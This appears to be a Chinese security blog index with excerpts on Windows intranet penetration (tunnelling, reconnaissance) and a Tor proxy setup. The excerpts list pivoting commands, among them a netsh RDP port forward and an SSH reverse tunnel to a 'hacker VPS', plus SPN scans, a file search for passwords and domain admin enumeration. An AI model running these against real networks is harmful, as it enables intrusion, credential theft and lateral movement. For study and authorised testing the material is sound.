-
Windows内网渗透_2.传输通道
2.1、判断出网 ping icmp curl http nslookup dns 2.2、netsh端口转发 A机器执行如下命令: netsh interface portproxy add v4tov4 listenport=5555 connectport=3389 connectaddress=192.168.1.1 protocol=tcp B机器访问A机器的5555端口,即是192.168.1.1的3389端口 2.3、ssh ssh一般被拿来登录linux机器,也可以拿来做代理和转发。 a、开启socks代理: ssh -qTfnN -D 1111 root@1.1.1.1 输入1.1.1.1机器密码,本地利用proxychains等类似工具连接本地的1111端口的sock5连接即可代理1.1.1.1的网络。 b、控制A、B机器,A能够访问B,且能出网,B能够访问C,但不能出网,A不能访问C: A机器执行: ssh -CNfg -L 2121:CIP:21 root@BIP 输入BIP机器密码,访问A的2121端口即是访问CIP的21端口。 c、控制A机器,A能够访问B: A机器执行: ssh -CNfg -R 2121:BIP:21 root@hackervps 输入黑客vps密码,访问黑客vps的2121端口即是访问BIP的21端口。 2.4、Neo-reGeorg https://github.com/L-codes/Neo-reGeorg python neoreg.py generate -k...
-
Windows内网渗透_1.信息收集
1.1、SPN SPN:服务主体名称。使用Kerberos须为服务器注册SPN,因此可以在内网中扫描SPN,快速寻找内网中注册的服务,SPN扫描可以规避像端口扫描的不确定性探测动作。 setspn -T domain.com -Q \*/\* 1.2、端口连接 netstat -ano 1.3、配置文件 可以使用如下命令寻找包含密码字段的文件: cd /webfindstr /s /m "password" *.* Tomcat:CATALINA_HOME/conf/tomcat-users.xml Apache:/etc/httpd/conf/httpd.conf Nginx:/etc/nginx/nginx.conf Wdcp:/www/wdlinux/wdcp/conf/mrpw.conf Mysql:mysql\data\mysql\user.MYD 1.4、用户信息 a、查看域用户,普通域用户权限即可: net user /domain b、查看域管理员: net group “domain admins” /domain c、快速定位域控ip,一般是dns、时间服务器: net time /domain ipconfig /all nslookup -type=all_ldap._tcp.dc._msdcs.jumbolab.com d、查看域控制器: net group “domain controllers” /domain 1.5、内网主机发现 a、查看共享资料:...
-
Tor透明代理
Tor over vpn, Burp Suite and Firefox 零 有比这个方案更好的选择,就是使用tor+redsocks+iptables搭建一个透明代理,用一台主机作为网关,在该主机上搭建Tor服务并做好流量转发,实现所有以该主机为网关的机器均可以直接访问Tor,我个人推荐使用这个方案,可以参考这篇文章:https://hujiekang.top/2021/04/15/Tor-transparent-proxy/ 一 简要介绍 在kali虚拟机下,先连接vpn到国外结点,然后通过vpn连接Tor,最后再用Burp Suite和Firefox进行抓包 二 准备工作 主机挂不挂vpn无所谓,使用vmware准备一个kali虚拟机,网络适配器选择NAT模式,其他的都常规安装就行,以及vpn 三 具体步骤 1 配置使用v2ray 1 准备文件 # v2ray wget https://github.com/v2ray/v2ray-core/releases/download/v4.27.0/v2ray-linux-64.zip # Qv2ray wget https://github.com/Qv2ray/Qv2ray/releases/download/v2.6.3/Qv2ray.v2.6.3.linux-x64.AppImage 2 解压 unzip v2ray-linux-64.zip 3 运行 chmod +x Qv2ray.v2.6.3.linux-x64.AppImage ./Qv2ray.v2.6.3.linux-x64.AppImage 4 运行后如下 5 选择左上角preference -> General Settings,可以更改语言为中文 6 然后选择内核设置,将 V2Ray核心可执行文件路径...